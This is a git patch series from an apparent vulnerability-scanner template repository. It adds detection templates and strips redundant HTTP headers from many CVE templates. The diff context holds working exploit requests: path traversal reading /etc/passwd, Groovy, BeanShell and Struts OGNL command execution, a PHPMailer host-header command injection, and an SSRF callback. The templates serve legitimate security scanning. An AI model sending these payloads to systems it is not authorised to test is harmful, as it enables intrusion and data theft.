"{{BaseURL}}/index.php?option=com_perchaimageattach&controller=../../../../../../../../../../etc/passwd%00" + + matchers-condition: and + matchers: + + - type: regex + regex: + - "root:.*:0:0" + + - type: status + status: + - 200 From 31ad69e0cac2e5ab5acde66e1ca7c8c99d354535 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 8 Sep 2021 08:10:38 +0700 Subject: [PATCH 2085/4083] Create eg-manager-detect.yaml --- technologies/eg-manager-detect.yaml | 25 +++++++++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 technologies/eg-manager-detect.yaml diff --git a/technologies/eg-manager-detect.yaml b/technologies/eg-manager-detect.yaml new file mode 100644 index 0000000000..a4b158433e --- /dev/null +++ b/technologies/eg-manager-detect.yaml @@ -0,0 +1,25 @@ +id: eg-manager-detect + +info: + name: eG Manager Detect + author: pikpikcu + severity: info + tags: tech,eg + +requests: + - method: GET + path: + - "{{BaseURL}}/final/" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - " eG Innovations, Inc." + - "eG Innovations, Inc. All Rights Reserved" + + - type: status + status: + - 200 From 2f110a8a557c8e1e0b0b28695b2732cbbc04bf88 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Wed, 8 Sep 2021 11:28:35 +0700 Subject: [PATCH 2086/4083] Create daybyday-detect.yaml --- technologies/daybyday-detect.yaml | 24 ++++++++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 technologies/daybyday-detect.yaml diff --git a/technologies/daybyday-detect.yaml b/technologies/daybyday-detect.yaml new file mode 100644 index 0000000000..15aa07c91a --- /dev/null +++ b/technologies/daybyday-detect.yaml @@ -0,0 +1,24 @@ +id: daybyday-detect + +info: + name: DaybydayCRM Detect + author: pikpikcu + severity: info + tags: tech,daybyday + +requests: + - method: GET + path: + - "{{BaseURL}}/login" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Daybyday - Login" + + - type: status + status: + - 200 From 7e601216b9905396d70d26fa8edef891fa4781aa Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 12:58:02 +0530 Subject: [PATCH 2087/4083] Added additional path --- misconfiguration/aem/aem-groovyconsole.yaml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/misconfiguration/aem/aem-groovyconsole.yaml b/misconfiguration/aem/aem-groovyconsole.yaml index b56d705f16..a2a388a6ec 100644 --- a/misconfiguration/aem/aem-groovyconsole.yaml +++ b/misconfiguration/aem/aem-groovyconsole.yaml @@ -5,17 +5,21 @@ info: author: Dheerajmadhukar severity: critical description: Groovy console is exposed, RCE is possible. - reference: https://hackerone.com/reports/672243 + reference: + - https://hackerone.com/reports/672243 + - https://twitter.com/XHackerx007/status/1435139576314671105 tags: aem requests: - method: GET path: - "{{BaseURL}}/groovyconsole" + - "{{BaseURL}}/etc/groovyconsole.html" headers: Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Accept-Language: en-US,en;q=0.9,hi;q=0.8 + stop-at-first-match: true matchers-condition: and matchers: - type: word @@ -25,6 +29,7 @@ requests: - "Groovy Web Console" part: body condition: and + - type: status status: - 200 \ No newline at end of file From 0880b652841ddb4d6087048bdbb29386681b018c Mon Sep 17 00:00:00 2001 From: Sandeep Singh Date: Wed, 8 Sep 2021 13:11:41 +0530 Subject: [PATCH 2088/4083] =?UTF-8?q?Rename=20CVE-2018=E2=80=9314064.yaml?= =?UTF-8?q?=20to=20CVE-2018-14064.yaml?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2018/{CVE-2018–14064.yaml => CVE-2018-14064.yaml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename cves/2018/{CVE-2018–14064.yaml => CVE-2018-14064.yaml} (100%) diff --git a/cves/2018/CVE-2018–14064.yaml b/cves/2018/CVE-2018-14064.yaml similarity index 100% rename from cves/2018/CVE-2018–14064.yaml rename to cves/2018/CVE-2018-14064.yaml From 609705f67645e2bff36ea0dd1f075151cc5771f5 Mon Sep 17 00:00:00 2001 From: sandeep Date: Wed, 8 Sep 2021 17:47:19 +0530 Subject: [PATCH 2089/4083] removed extra headers not required for template --- cnvd/CNVD-2020-68596.yaml | 9 +--- cnvd/CNVD-2021-15822.yaml | 1 - cnvd/CNVD-2021-30167.yaml | 2 - cves/2009/CVE-2009-1151.yaml | 4 -- cves/2012/CVE-2012-1823.yaml | 2 - cves/2014/CVE-2014-3120.yaml | 3 -- cves/2015/CVE-2015-1427.yaml | 7 ---- cves/2016/CVE-2016-10033.yaml | 6 --- cves/2016/CVE-2016-3081.yaml | 1 - cves/2017/CVE-2017-1000486.yaml | 3 -- cves/2017/CVE-2017-10271.yaml | 3 -- cves/2017/CVE-2017-12635.yaml | 4 -- cves/2017/CVE-2017-14537.yaml | 9 +--- cves/2017/CVE-2017-15715.yaml | 6 --- cves/2017/CVE-2017-17562.yaml | 4 +- cves/2017/CVE-2017-3506.yaml | 2 - cves/2017/CVE-2017-5638.yaml | 4 -- cves/2017/CVE-2017-9506.yaml | 4 -- cves/2017/CVE-2017-9822.yaml | 4 -- cves/2017/CVE-2017-9841.yaml | 36 ---------------- cves/2018/CVE-2018-1000130.yaml | 17 +++----- cves/2018/CVE-2018-1000533.yaml | 2 - cves/2018/CVE-2018-10141.yaml | 2 - cves/2018/CVE-2018-10818.yaml | 4 -- cves/2018/CVE-2018-16167.yaml | 4 -- cves/2018/CVE-2018-16763.yaml | 1 - cves/2018/CVE-2018-17254.yaml | 1 - cves/2018/CVE-2018-18778.yaml | 2 +- cves/2018/CVE-2018-3760.yaml | 3 -- cves/2018/CVE-2018-7600.yaml | 3 -- cves/2018/CVE-2018-8715.yaml | 5 --- cves/2019/CVE-2019-1010287.yaml | 8 +--- cves/2019/CVE-2019-11869.yaml | 3 -- cves/2019/CVE-2019-13101.yaml | 2 - cves/2019/CVE-2019-15107.yaml | 7 +--- cves/2019/CVE-2019-16278.yaml | 3 -- cves/2019/CVE-2019-16920.yaml | 23 +++------- cves/2019/CVE-2019-17382.yaml | 1 - cves/2019/CVE-2019-17558.yaml | 3 -- cves/2019/CVE-2019-2616.yaml | 1 - cves/2019/CVE-2019-3396.yaml | 6 +-- cves/2019/CVE-2019-6715.yaml | 4 -- cves/2019/CVE-2019-7256.yaml | 16 ++----- cves/2019/CVE-2019-7609.yaml | 16 +++---- cves/2019/CVE-2019-9670.yaml | 1 - cves/2019/CVE-2019-9733.yaml | 10 ++--- cves/2020/CVE-2020-11978.yaml | 9 ---- cves/2020/CVE-2020-12720.yaml | 3 -- cves/2020/CVE-2020-13167.yaml | 19 ++------- cves/2020/CVE-2020-15568.yaml | 2 - cves/2020/CVE-2020-16139.yaml | 1 - cves/2020/CVE-2020-17505.yaml | 5 +-- cves/2020/CVE-2020-17518.yaml | 2 - cves/2020/CVE-2020-24186.yaml | 11 ----- cves/2020/CVE-2020-24579.yaml | 15 +------ cves/2020/CVE-2020-25213.yaml | 2 - cves/2020/CVE-2020-25506.yaml | 4 -- cves/2020/CVE-2020-26919.yaml | 2 - cves/2020/CVE-2020-28188.yaml | 9 +--- cves/2020/CVE-2020-28208.yaml | 3 -- cves/2020/CVE-2020-35713.yaml | 7 +--- cves/2020/CVE-2020-3580.yaml | 1 - cves/2020/CVE-2020-35951.yaml | 21 +--------- cves/2020/CVE-2020-36112.yaml | 8 ---- cves/2020/CVE-2020-5307.yaml | 2 - cves/2020/CVE-2020-5902.yaml | 14 +++---- cves/2020/CVE-2020-7796.yaml | 3 -- cves/2020/CVE-2020-7961.yaml | 9 +--- cves/2020/CVE-2020-8191.yaml | 9 +--- cves/2020/CVE-2020-8193.yaml | 24 +---------- cves/2020/CVE-2020-8194.yaml | 14 ++----- cves/2020/CVE-2020-8515.yaml | 3 -- cves/2020/CVE-2020-8813.yaml | 4 -- cves/2020/CVE-2020-9315.yaml | 2 - cves/2021/CVE-2021-1497.yaml | 2 - cves/2021/CVE-2021-20092.yaml | 4 -- cves/2021/CVE-2021-21307.yaml | 15 +------ cves/2021/CVE-2021-21389.yaml | 1 - cves/2021/CVE-2021-21975.yaml | 1 - cves/2021/CVE-2021-21985.yaml | 2 - cves/2021/CVE-2021-22214.yaml | 2 - cves/2021/CVE-2021-24285.yaml | 1 - cves/2021/CVE-2021-25281.yaml | 6 --- cves/2021/CVE-2021-25646.yaml | 3 -- cves/2021/CVE-2021-26295.yaml | 42 +++++++++---------- cves/2021/CVE-2021-27850.yaml | 9 +--- cves/2021/CVE-2021-28150.yaml | 17 +------- cves/2021/CVE-2021-28151.yaml | 22 +--------- cves/2021/CVE-2021-29203.yaml | 6 --- cves/2021/CVE-2021-30461.yaml | 4 -- cves/2021/CVE-2021-3129.yaml | 18 -------- cves/2021/CVE-2021-31755.yaml | 8 +--- cves/2021/CVE-2021-32030.yaml | 1 - cves/2021/CVE-2021-3297.yaml | 4 -- cves/2021/CVE-2021-33544.yaml | 3 -- cves/2021/CVE-2021-34429.yaml | 2 - cves/2021/CVE-2021-34621.yaml | 6 --- cves/2021/CVE-2021-35336.yaml | 4 +- default-logins/abb/cs141-default-login.yaml | 12 ------ .../aem/adobe-aem-default-credentials.yaml | 6 --- .../apache/airflow-default-credentials.yaml | 9 ---- .../apache-superset-default-credentials.yaml | 9 ---- .../dell/dell-idrac-default-login.yaml | 9 ++-- .../dell/dell-idrac9-default-login.yaml | 6 --- .../flir/flir-ax8-default-credentials.yaml | 5 --- default-logins/gitlab/gitlab-weak-login.yaml | 3 -- .../glpi/glpi-default-credential.yaml | 14 ------- .../grafana/grafana-default-credential.yaml | 5 --- .../hongdian/hongdian-default-password.yaml | 10 ----- .../ibm/ibm-storage-default-credential.yaml | 4 +- .../iptime/iptime-default-login.yaml | 4 +- .../nexus/nexus-default-password.yaml | 2 - .../oracle/oracle-bi-default-credentials.yaml | 6 +-- .../panabit/panabit-default-password.yaml | 3 -- .../rockmongo-default-credentials.yaml | 1 - .../spectracom-default-credential.yaml | 3 -- .../trilithic-viewpoint-default.yaml | 1 - .../wso2/wso2-default-password.yaml | 4 +- .../xxljob/xxljob-default-login.yaml | 1 - exposed-panels/acunetix-panel.yaml | 3 +- exposed-panels/atlassian-crowd-panel.yaml | 3 +- exposed-panels/checkmarx-panel.yaml | 3 +- exposed-panels/citrix-adc-gateway-detect.yaml | 4 +- exposed-panels/couchdb-exposure.yaml | 5 +-- exposed-panels/nessus-panel.yaml | 5 ++- .../prometheus-exporter-detect.yaml | 4 +- exposed-panels/solarwinds-orion.yaml | 3 +- .../configs/ruijie-eg-password-leak.yaml | 2 - .../ruijie-nbr1300g-cli-password-leak.yaml | 1 - .../logs/oracle-ebs-sqllog-disclosure.yaml | 2 - fuzzing/iis-shortname.yaml | 12 ------ fuzzing/xff-403-bypass.yaml | 12 ------ iot/targa-camera-ssrf.yaml | 4 -- misconfiguration/aem/aem-crx-bypass.yaml | 4 -- .../aem/aem-hash-querybuilder.yaml | 4 -- .../aem/aem-jcr-querybuilder.yaml | 4 -- misconfiguration/aspx-debug-mode.yaml | 2 - misconfiguration/cloudflare-image-ssrf.yaml | 3 -- .../iis-internal-ip-disclosure.yaml | 1 - .../ssrf-via-oauth-misconfig.yaml | 2 - technologies/clockwork-php-page.yaml | 3 +- technologies/dell/dell-idrac6-detect.yaml | 2 - technologies/dell/dell-idrac7-detect.yaml | 2 - technologies/dell/dell-idrac8-detect.yaml | 2 - technologies/dell/dell-idrac9-detect.yaml | 3 -- technologies/kibana-detect.yaml | 3 +- technologies/liferay-portal-detect.yaml | 3 +- technologies/pega-detect.yaml | 3 +- technologies/prometheus-exposed-panel.yaml | 3 +- .../apache/apache-flink-unauth-rce.yaml | 6 +-- .../jenkins/jenkins-stack-trace.yaml | 6 +-- .../jolokia/jolokia-heap-info-disclosure.yaml | 8 +--- .../oscommerce/oscommerce-rce.yaml | 7 ---- .../other/bullwark-momentum-lfi.yaml | 1 - .../other/core-chuangtian-cloud-rce.yaml | 5 --- vulnerabilities/other/couchdb-adminparty.yaml | 3 +- vulnerabilities/other/eyou-email-rce.yaml | 4 -- .../other/geovision-geowebserver-xss.yaml | 1 - vulnerabilities/other/gloo-unauth.yaml | 1 - .../other/hashicorp-consul-rce.yaml | 6 +-- .../other/hasura-graphql-ssrf.yaml | 7 +--- vulnerabilities/other/hiboss-rce.yaml | 5 --- .../other/hjtcloud-arbitrary-file-read.yaml | 4 -- .../other/huawei-router-auth-bypass.yaml | 5 --- vulnerabilities/other/jeewms-lfi.yaml | 2 - .../other/jfrog-unauth-build-exposed.yaml | 2 - .../other/kevinlab-bems-backdoor.yaml | 4 -- vulnerabilities/other/kevinlab-bems-sqli.yaml | 4 -- vulnerabilities/other/keycloak-xss.yaml | 3 -- .../other/landray-oa-fileread.yaml | 8 ---- .../other/maian-cart-preauth-rce.yaml | 10 ----- .../other/mida-eframework-xss.yaml | 2 +- vulnerabilities/other/mirai-unknown-rce.yaml | 2 - .../other/netgear-router-auth-bypass.yaml | 9 +--- .../other/netgear-wnap320-rce.yaml | 3 -- .../other/oa-tongda-path-traversal.yaml | 2 - vulnerabilities/other/oa-v9-uploads-file.yaml | 6 --- .../other/optilink-ont1gew-gpon-rce.yaml | 12 ++---- .../other/php-zerodium-backdoor-rce.yaml | 2 + .../other/powercreator-cms-rce.yaml | 4 -- ...-netkang-next-generation-firewall-rce.yaml | 4 +- .../other/rce-shellshock-user-agent.yaml | 6 ++- vulnerabilities/other/rconfig-rce.yaml | 15 +++---- vulnerabilities/other/ruijie-eg-rce.yaml | 5 --- .../other/ruijie-networks-rce.yaml | 4 -- vulnerabilities/other/sar2html-rce.yaml | 6 +-- .../other/showdoc-file-upload-rce.yaml | 3 -- .../other/simple-employee-rce.yaml | 10 +---- .../other/sonicwall-sslvpn-shellshock.yaml | 2 - vulnerabilities/other/vpms-auth-bypass.yaml | 6 +-- vulnerabilities/other/yapi-rce.yaml | 18 -------- .../other/zimbra-preauth-ssrf.yaml | 3 -- vulnerabilities/other/zms-auth-bypass.yaml | 10 ++--- .../rocketchat/unauth-message-read.yaml | 8 ---- .../wordpress-infinitewp-auth-bypass.yaml | 9 ---- .../wordpress-rce-simplefilelist.yaml | 7 ---- .../wordpress/wordpress-zebra-form-xss.yaml | 8 +--- .../wordpress/wp-multiple-theme-ssrf.yaml | 4 -- 198 files changed, 138 insertions(+), 1011 deletions(-) diff --git a/cnvd/CNVD-2020-68596.yaml b/cnvd/CNVD-2020-68596.yaml index 9f1c78f053..56cd6901fd 100644 --- a/cnvd/CNVD-2020-68596.yaml +++ b/cnvd/CNVD-2020-68596.yaml @@ -12,24 +12,17 @@ requests: - | POST /public/index.php/material/Material/_download_imgage?media_id=1&picUrl=./../config/database.php HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Content-Length: 5 Content-Type: application/x-www-form-urlencoded - Accept-Encoding: deflate "1":1 - | GET /public/index.php/home/file/user_pics HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: gzip - Accept-Encoding: deflate + - | GET {{endpoint}} HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 - Accept-Encoding: deflate extractors: - type: regex diff --git a/cnvd/CNVD-2021-15822.yaml b/cnvd/CNVD-2021-15822.yaml index b41d42c850..83e4dc3d9d 100644 --- a/cnvd/CNVD-2021-15822.yaml +++ b/cnvd/CNVD-2021-15822.yaml @@ -12,7 +12,6 @@ requests: - | GET /public/index.php?s=/index/qrcode/download/url/L2V0Yy9wYXNzd2Q= HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded matchers-condition: and diff --git a/cnvd/CNVD-2021-30167.yaml b/cnvd/CNVD-2021-30167.yaml index c6a28b6fb0..41c508efc2 100644 --- a/cnvd/CNVD-2021-30167.yaml +++ b/cnvd/CNVD-2021-30167.yaml @@ -14,7 +14,6 @@ requests: - | #linux POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded bsh.script=exec("id"); @@ -22,7 +21,6 @@ requests: - | #windows POST /servlet/~ic/bsh.servlet.BshServlet HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:55.0) Gecko/20100101 Firefox/55.0 Content-Type: application/x-www-form-urlencoded bsh.script=exec("ipconfig"); diff --git a/cves/2009/CVE-2009-1151.yaml b/cves/2009/CVE-2009-1151.yaml index 2837b0aa42..36ff315c20 100644 --- a/cves/2009/CVE-2009-1151.yaml +++ b/cves/2009/CVE-2009-1151.yaml @@ -17,11 +17,7 @@ requests: Host: {{Hostname}} Accept-Encoding: gzip, deflate Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 80 action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";} diff --git a/cves/2012/CVE-2012-1823.yaml b/cves/2012/CVE-2012-1823.yaml index c6730730c0..0a1111e02c 100644 --- a/cves/2012/CVE-2012-1823.yaml +++ b/cves/2012/CVE-2012-1823.yaml @@ -16,9 +16,7 @@ requests: - | POST /index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:78.0) Gecko/20100101 Firefox/78.0 Content-Type: application/x-www-form-urlencoded - Content-Length: 31 diff --git a/cves/2014/CVE-2014-3120.yaml b/cves/2014/CVE-2014-3120.yaml index 68a2b11bcd..a2bd566a60 100644 --- a/cves/2014/CVE-2014-3120.yaml +++ b/cves/2014/CVE-2014-3120.yaml @@ -18,10 +18,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "size": 1, diff --git a/cves/2015/CVE-2015-1427.yaml b/cves/2015/CVE-2015-1427.yaml index 40dd85cb6b..79427e3ba5 100644 --- a/cves/2015/CVE-2015-1427.yaml +++ b/cves/2015/CVE-2015-1427.yaml @@ -17,10 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 { "name": "test" @@ -29,11 +26,7 @@ requests: POST /_search HTTP/1.1 Host: {{Hostname}} Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: application/x-www-form-urlencoded - Content-Length: 343 {"size":1, "script_fields": {"lupin":{"lang":"groovy","script": "java.lang.Math.class.forName(\"java.lang.Runtime\").getRuntime().exec(\"cat /etc/passwd\").getText()"}}} diff --git a/cves/2016/CVE-2016-10033.yaml b/cves/2016/CVE-2016-10033.yaml index 4f7d3d42da..479d0f70f3 100644 --- a/cves/2016/CVE-2016-10033.yaml +++ b/cves/2016/CVE-2016-10033.yaml @@ -12,18 +12,12 @@ requests: - |+ GET /?author=1 HTTP/1.1 Host: {{Hostname}} - Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 - Accept-Language: en-US,en;q=0.9 - Connection: close - |+ POST /wp-login.php?action=lostpassword HTTP/1.1 Host: target(any -froot@localhost -be ${run{${substr{0}{1}{$spool_directory}}bin${substr{0}{1}{$spool_directory}}touch${substr{10}{1}{$tod_log}}${substr{0}{1}{$spool_directory}}tmp${substr{0}{1}{$spool_directory}}success}} null) - Connection: close - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Accept: */* - Content-Length: 56 Content-Type: application/x-www-form-urlencoded wp-submit=Get+New+Password&redirect_to=&user_login={{username}} diff --git a/cves/2016/CVE-2016-3081.yaml b/cves/2016/CVE-2016-3081.yaml index 05119f088c..26b9577ef4 100644 --- a/cves/2016/CVE-2016-3081.yaml +++ b/cves/2016/CVE-2016-3081.yaml @@ -16,7 +16,6 @@ requests: - | GET /index.action?method:%23_memberAccess%3d@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS,%23res%3d%40org.apache.struts2.ServletActionContext%40getResponse(),%23res.setCharacterEncoding(%23parameters.encoding%5B0%5D),%23w%3d%23res.getWriter(),%23s%3dnew+java.util.Scanner(@java.lang.Runtime@getRuntime().exec(%23parameters.cmd%5B0%5D).getInputStream()).useDelimiter(%23parameters.pp%5B0%5D),%23str%3d%23s.hasNext()%3f%23s.next()%3a%23parameters.ppp%5B0%5D,%23w.print(%23str),%23w.close(),1?%23xx:%23request.toString&pp=%5C%5CA&ppp=%20&encoding=UTF-8&cmd=cat%20/etc/passwd HTTP/1.1 Host: {{Hostname}} - Content-Length: 4 matchers-condition: and matchers: diff --git a/cves/2017/CVE-2017-1000486.yaml b/cves/2017/CVE-2017-1000486.yaml index 41d8c711b1..16dc0d9801 100644 --- a/cves/2017/CVE-2017-1000486.yaml +++ b/cves/2017/CVE-2017-1000486.yaml @@ -17,10 +17,7 @@ requests: - | POST /javax.faces.resource/dynamiccontent.properties.xhtml HTTP/1.1 Host: {{Hostname}} - Connection: close - Content-Length: 160 Accept: */* - Accept-Language: en Content-Type: application/x-www-form-urlencoded Accept-Encoding: gzip, deflate diff --git a/cves/2017/CVE-2017-10271.yaml b/cves/2017/CVE-2017-10271.yaml index 2782404f8a..26de578c10 100644 --- a/cves/2017/CVE-2017-10271.yaml +++ b/cves/2017/CVE-2017-10271.yaml @@ -17,10 +17,7 @@ requests: Host: {{Hostname}} Accept: */* Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close Content-Type: text/xml - Content-Length: 5178 diff --git a/cves/2017/CVE-2017-12635.yaml b/cves/2017/CVE-2017-12635.yaml index 88173e6fbf..5565f23393 100644 --- a/cves/2017/CVE-2017-12635.yaml +++ b/cves/2017/CVE-2017-12635.yaml @@ -13,11 +13,7 @@ requests: - | PUT /_users/org.couchdb.user:poc HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: application/json - Connection: close - Upgrade-Insecure-Requests: 1 - Content-Length: 108 { "type": "user", diff --git a/cves/2017/CVE-2017-14537.yaml b/cves/2017/CVE-2017-14537.yaml index 87579df08b..9772411357 100644 --- a/cves/2017/CVE-2017-14537.yaml +++ b/cves/2017/CVE-2017-14537.yaml @@ -16,35 +16,28 @@ requests: - | POST /maint/index.php?packages HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 Content-Type: application/x-www-form-urlencoded Referer: {{Hostname}}/maint/index.php?packages - Content-Length: 160 Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive xajax=menu&xajaxr=1504969293893&xajaxargs[]=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd&xajaxargs[]=yumPackages - | GET /maint/modules/home/index.php?lang=..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd%00english HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: en-US,en;q=0.5 Referer: {{Hostname}}/maint/index.php?packages Cookie: lng=en; security_level=0; PHPSESSID=7fasl890v1c51vu0d31oemt3j1; ARI=teev7d0kgvdko8u5b26p3335a2 Authorization: Basic bWFpbnQ6cGFzc3dvcmQ= - Connection: keep-alive - Upgrade-Insecure-Requests: 1 matchers-condition: and matchers: - type: status status: - 200 + - type: regex regex: - "root:.*:0:0:" diff --git a/cves/2017/CVE-2017-15715.yaml b/cves/2017/CVE-2017-15715.yaml index 0677931936..2de5b8d83a 100644 --- a/cves/2017/CVE-2017-15715.yaml +++ b/cves/2017/CVE-2017-15715.yaml @@ -13,10 +13,7 @@ requests: - | POST / HTTP/1.1 Host: {{Hostname}} - Content-Length: 264 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ - Accept-Encoding: gzip, deflate - Connection: close ------WebKitFormBoundaryKc8fBVDo558U4hbJ Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" @@ -34,9 +31,6 @@ requests: Host: {{Hostname}} Accept-Encoding: gzip,deflate Accept: */* - Accept-Language: en - User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) - Connection: close req-condition: true matchers: diff --git a/cves/2017/CVE-2017-17562.yaml b/cves/2017/CVE-2017-17562.yaml index 136b15b2b5..ab048ea172 100644 --- a/cves/2017/CVE-2017-17562.yaml +++ b/cves/2017/CVE-2017-17562.yaml @@ -14,11 +14,9 @@ info: requests: - raw: - | - GET /cgi-bin/§endpoint§?LD_DEBUG=help HTTP/1.1 + GET /cgi-bin/{{endpoint}}?LD_DEBUG=help HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1) Accept: */* - Connection: close payloads: endpoint: diff --git a/cves/2017/CVE-2017-3506.yaml b/cves/2017/CVE-2017-3506.yaml index 954ace9e22..5ccba81a04 100644 --- a/cves/2017/CVE-2017-3506.yaml +++ b/cves/2017/CVE-2017-3506.yaml @@ -16,10 +16,8 @@ requests: POST /wls-wsat/RegistrationRequesterPortType HTTP/1.1 Host: {{Hostname}} Content-Type: text/xml - User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0, Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8, Content-Type: text/xml;charset=UTF-8 - Content-Length: 873 diff --git a/cves/2017/CVE-2017-5638.yaml b/cves/2017/CVE-2017-5638.yaml index e09313bde2..ad22c9704a 100644 --- a/cves/2017/CVE-2017-5638.yaml +++ b/cves/2017/CVE-2017-5638.yaml @@ -13,11 +13,7 @@ requests: GET / HTTP/1.1 Host: {{Hostname}} Accept-Charset: iso-8859-1,utf-8;q=0.9,*;q=0.1 - Accept-Language: en Content-Type: %{#context['com.opensymphony.xwork2.dispatcher.HttpServletResponse'].addHeader('X-Hacker','Bounty Plz')}.multipart/form-data - Connection: Keep-Alive - User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0) - Pragma: no-cache Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */* matchers: diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 0d45c0ac48..30ca442da3 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -17,10 +17,6 @@ requests: GET /plugins/servlet/oauth/users/icon-uri?consumerUri=http://{{interactsh-url}} HTTP/1.1 Host: {{Hostname}} Origin: {{BaseURL}} - Connection: close - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 - Accept-Language: en-US,en;q=0.9 matchers: - type: word diff --git a/cves/2017/CVE-2017-9822.yaml b/cves/2017/CVE-2017-9822.yaml index 257292c0b8..c2ae610bf1 100644 --- a/cves/2017/CVE-2017-9822.yaml +++ b/cves/2017/CVE-2017-9822.yaml @@ -13,12 +13,8 @@ requests: - | GET /__ HTTP/1.1 Host: {{Hostname}} - User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:79.0) Gecko/20100101 Firefox/79.0 Accept: text/javascript, application/javascript, application/ecmascript, application/x-ecmascript, */*; q=0.01 - Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 - Accept-Encoding: gzip, deflate X-Requested-With: XMLHttpRequest - Connection: close Cookie: dnn_IsMobile=False; DNNPersonalization=WriteFileC:\Windows\win.ini matchers-condition: and diff --git a/cves/2017/CVE-2017-9841.yaml b/cves/2017/CVE-2017-9841.yaml index 583039f7e5..0a1de31159 100644 --- a/cves/2017/CVE-2017-9841.yaml +++ b/cves/2017/CVE-2017-9841.yaml @@ -18,78 +18,42 @@ requests: 